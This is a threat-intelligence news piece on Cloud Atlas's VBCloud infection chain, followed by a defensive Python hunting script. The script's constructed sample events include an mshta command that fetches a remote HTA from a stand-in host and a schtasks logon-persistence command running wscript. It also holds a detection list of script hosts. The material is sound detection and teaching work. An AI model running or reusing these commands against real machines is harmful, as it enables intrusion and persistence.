The cyber threat group known as Cloud Atlas, also referred to as Clean Ursa, Inception, Oxygen, and Red October, has been observed using a newly identified malware called VBCloud in its recent attack campaigns.
These campaigns, targeting "several dozen users" in 2024, primarily relied on phishing emails containing malicious documents. The documents exploited a vulnerability in the Microsoft Office Equation Editor (CVE-2018-0802) to execute the malware. While over 80% of the victims were located in Russia, additional cases were reported in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam, according to a report by Kaspersky researcher Oleg Kupreev.
VBCloud is the last stage of a multi-stage attack chain that begins with a booby-trapped Microsoft Office document. Once opened, the document fetches a malicious RTF template from a remote server; the RTF exploits CVE-2018-0802 in the Equation Editor to download and run an HTML Application (HTA) file, which in turn installs VBShower, a backdoor capable of downloading additional payloads such as PowerShower and VBCloud. VBShower also covers its tracks by cleaning up the temporary files it leaves behind. PowerShower plays a comparable role in PowerShell: it retrieves and runs PowerShell scripts for post-exploitation, including Kerberoasting to obtain crackable service-account credentials. Kaspersky documented seven distinct PowerShell payloads, each built for a specific task such as gathering system information, conducting dictionary attacks against accounts, or probing network resources.
VBCloud stands apart by relying on public cloud storage for command-and-control (C2) communications. Launched by a scheduled task each time the user logs in, it collects system metadata and harvests sensitive documents and files, including data belonging to the Telegram messaging app. PowerShower, by contrast, handles network reconnaissance and lateral expansion. Together, these components form an infection chain built to steal data and extend access inside targeted networks.
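The two observable pivots in the chain described above are the Equation Editor process spawning a script host (the CVE-2018-0802 stage handing off to the HTA) and a scheduled task registered to run a script host at logon (VBCloud's persistence). The following is an added example of hunting logic for both, written for this page and not taken from Kaspersky's report or the malware itself. It runs over constructed process-creation records in the shape of Sysmon Event ID 1; every path, task name and URL in the sample data is made up, and the assumption that the HTA and VBScript stages run under the standard Windows script hosts (mshta.exe, wscript.exe, cscript.exe) is mine, not a detail the report gives.

```python
"""Hunt for the Cloud Atlas-style chain in process-creation telemetry.

Added example (not code from the page or from Kaspersky). Sample events are
constructed; the script-host assumption is noted inline.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # basename of the new process
    parent_image: str   # basename of the creating process
    cmdline: str


# Assumption: the HTA/VBScript stages run under the usual Windows script hosts.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
EQUATION_EDITOR = "eqnedt32.exe"   # binary targeted by CVE-2017-11882 / CVE-2018-0802


def _ancestors(event, by_pid, limit=16):
    """Yield ancestor events, nearest first.

    EQNEDT32.EXE is started through DCOM, so its parent is normally svchost.exe
    rather than WINWORD.EXE. A rule keyed on "Office spawns Equation Editor"
    therefore misses; key on what *descends from* Equation Editor instead.
    The depth limit guards against PID reuse producing a cycle.
    """
    cur = by_pid.get(event.ppid)
    depth = 0
    while cur is not None and depth < limit:
        yield cur
        cur = by_pid.get(cur.ppid)
        depth += 1


def detect(events):
    """Return (rule_name, pid) findings for the two pivots of the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = e.image.lower()
        cmd = e.cmdline.lower()
        # Pivot 1: a script host anywhere beneath eqnedt32.exe (exploit -> HTA -> VBS).
        if img in SCRIPT_HOSTS and any(
            a.image.lower() == EQUATION_EDITOR for a in _ancestors(e, by_pid)
        ):
            findings.append(("script_host_descends_from_equation_editor", e.pid))
        # Pivot 2: persistence via a logon-triggered task that runs a script host.
        if (
            img == "schtasks.exe"
            and "/create" in cmd
            and "onlogon" in cmd
            and any(h in cmd for h in ("wscript", "cscript", "mshta"))
        ):
            findings.append(("logon_task_runs_script_host", e.pid))
    return findings


# Constructed sample telemetry: one malicious chain plus benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent(100, 50, "winword.exe", "explorer.exe",
              r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" C:\Users\u\Downloads\invite.docx'),
    ProcEvent(101, 20, "eqnedt32.exe", "svchost.exe",
              r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    ProcEvent(102, 101, "mshta.exe", "eqnedt32.exe",
              "mshta.exe https://example.invalid/r.hta"),
    ProcEvent(103, 102, "wscript.exe", "mshta.exe",
              r'wscript.exe //B C:\Users\u\AppData\Local\Temp\s.vbs'),
    ProcEvent(104, 103, "schtasks.exe", "wscript.exe",
              r'schtasks.exe /Create /SC ONLOGON /TN "Update" /TR "wscript.exe //B C:\Users\u\AppData\Roaming\u.vbs"'),
    # Benign: a daily task running a normal executable.
    ProcEvent(200, 50, "schtasks.exe", "explorer.exe",
              r"schtasks.exe /Create /SC DAILY /TN Backup /TR C:\Tools\backup.exe"),
    # Benign: Equation Editor opened legitimately, no children.
    ProcEvent(201, 20, "eqnedt32.exe", "svchost.exe",
              r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    # Benign: a user-launched script and a logon task running an .exe.
    ProcEvent(202, 50, "wscript.exe", "explorer.exe", r"wscript.exe C:\Tools\cleanup.vbs"),
    ProcEvent(203, 50, "schtasks.exe", "explorer.exe",
              r"schtasks.exe /Create /SC ONLOGON /TN Sync /TR C:\Tools\sync.exe"),
]


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Only the three malicious events (the HTA under Equation Editor, the VBScript under the HTA, and the logon-task registration) are reported; the benign Equation Editor launch, the user-run script and the logon task that starts an ordinary executable are not. The ancestry walk rather than a direct parent check is what lets the rule survive the DCOM launch path and any intermediate cmd.exe or mshta.exe stages.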
Kaspersky's analysis points to the continued refinement of Cloud Atlas's tooling, a group that has been active since 2014. The campaign also underscores how much mileage attackers still get from old Equation Editor bugs such as CVE-2018-0802 and CVE-2017-11882: a phishing lure plus an unpatched Office installation remains enough for initial access, after which purpose-built tooling like VBCloud handles espionage and data theft.